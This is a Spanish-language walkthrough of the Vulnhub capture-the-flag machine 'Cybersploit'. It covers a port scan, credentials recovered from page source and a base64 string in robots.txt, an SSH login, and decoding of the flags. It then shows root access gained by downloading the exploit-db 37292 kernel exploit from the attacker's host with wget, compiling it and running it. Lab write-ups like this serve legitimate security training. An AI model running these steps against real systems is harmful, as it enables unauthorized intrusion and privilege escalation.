[VLN] Cybersploit

Hoy vamos a hackear la maquina de Vulnhub llamada Cybersploit. Podeis descargarla desde el siguiente enlace: Cybersploit

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.78
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 16:25 CEST
Nmap scan report for cybersploit-CTF.home (192.168.1.78)
Host is up (0.00075s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.24 seconds
Visitamos http://192.168.1.78/ para ver si encontramos algo interesante en la web. Si miramos en el codigo de la web, podemos ver un comentario al final:

username:itsskv
Por otro lado, si visitamos el robots.txt en http://192.168.1.78/robots.txt, encontramos: R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9 Si hacemos el decode con base64 obtenemos:

~ > echo 
"R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" 
| base64 -d
Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}%
Nos logueamos con los credenciales: itsskv/cybersploit{youtube.com/c/cybersploit}

Low Shell



~ > ssh itsskv@192.168.1.132
The authenticity of host '192.168.1.132 (192.168.1.132)' can't be established.
ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.132' (ECDSA) to the list of known hosts.
itsskv@192.168.1.132's password: 
Permission denied, please try again.
itsskv@192.168.1.132's password: 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

332 packages can be updated.
273 updates are security updates.

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2017.

Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local
itsskv@cybersploit-CTF:~$
Echamos un vistazo a la /home de itsskv.

itsskv@cybersploit-CTF:~$ ls -la
total 156
drwxr-xr-x 20 itsskv itsskv  4096 Jun 27 10:00 .
drwxr-xr-x  4 root   root    4096 Jun 25 12:11 ..
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Desktop
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Documents
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Downloads
-rw-r--r--  1 itsskv itsskv  8445 Jun 25 12:11 examples.desktop
-rw-rw-r--  1 itsskv itsskv   495 Jun 27 10:03 flag2.txt
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Music
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Pictures
-rw-r--r--  1 itsskv itsskv   675 Jun 25 12:11 .profile
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Videos
Podemos ver que hay un fichero llamado flag2.txt. Le echamos un vistazo.

itsskv@cybersploit-CTF:~$ cat flag2.txt 
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 
01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 
00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 
01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 
01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 
01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 
01110000 01101100 01101111 01101001 01110100 00110001 01111101
Vemos que el contenido es un codigo "binario". Vamos a la siguiente web para convertirlo en ascii: https://www.rapidtables.com/convert/number/binary-to-ascii.html El resultado es:

good work !
flag2: cybersploit{https:t.me/cybersploit1}
Seguimos mirando el sistema y vemos que tiene un kernel antiguo.

Privilege Escalation



itsskv@cybersploit-CTF:~$ uname -a
Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 
03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
Si buscamos en exploit-db, encontramos el siguiente exploit[1]. Lo descargamos en nuestra maquina, y lo pasamos a la maquina "victima".

itsskv@cybersploit-CTF:/tmp$ wget http://192.168.1.111/37292.c
--2020-07-13 16:17:17--  http://192.168.1.111/37292.c
Connecting to 192.168.1.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [application/octet-stream]
Saving to: `37292.c'

100%[=====================================================>] 5,119       
--.-K/s   in 0s      

2020-07-13 16:17:17 (549 MB/s) - `37292.c' saved [5119/5119]
Una vez descargado, lo compilamos, le damos permisos de ejecucion y por ultimo lo ejecutamos.

itsskv@cybersploit-CTF:/tmp$ gcc -o 3 37292.c 
itsskv@cybersploit-CTF:/tmp$ chmod +x 3
itsskv@cybersploit-CTF:/tmp$ ./3
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
#
# id
uid=0(root) gid=0(root) groups=0(root),1001(itsskv)
Obtenemos root :)

finalflag.txt



# cd /root
# ls
finalflag.txt
# cat finalflag.txt
  ______ ____    ____ .______    _______ .______          _______..______    __ 
       ______    __  .___________.
 /      |\   \  /   / |   _  \  |   ____||   _  \        /       ||   _  \  |  
|      /  __  \  |  | |           |
|  ,----' \   \/   /  |  |_)  | |  |__   |  |_)  |      |   (----`|  |_)  | |  
|     |  |  |  | |  | `---|  |----`
|  |       \_    _/   |   _  <  |   __|  |      /        \   \    |   ___/  |  
|     |  |  |  | |  |     |  |     
|  `----.    |  |     |  |_)  | |  |____ |  |\  \----.----)   |   |  |      |  
`----.|  `--'  | |  |     |  |     
 \______|    |__|     |______/  |_______|| _| `._____|_______/    | _|      
|_______| \______/  |__|     |__|     
                                                                                
                                  

   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _  
  / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ 
 ( c | o | n | g | r | a | t | u | l | a | t | i | o | n | s )
  \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ 

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

if you like it share with me https://twitter.com/cybersploit1.
Thanks !

End


Y con esto ya seriamos root de la maquina :) [1] https://www.exploit-db.com/exploits/37292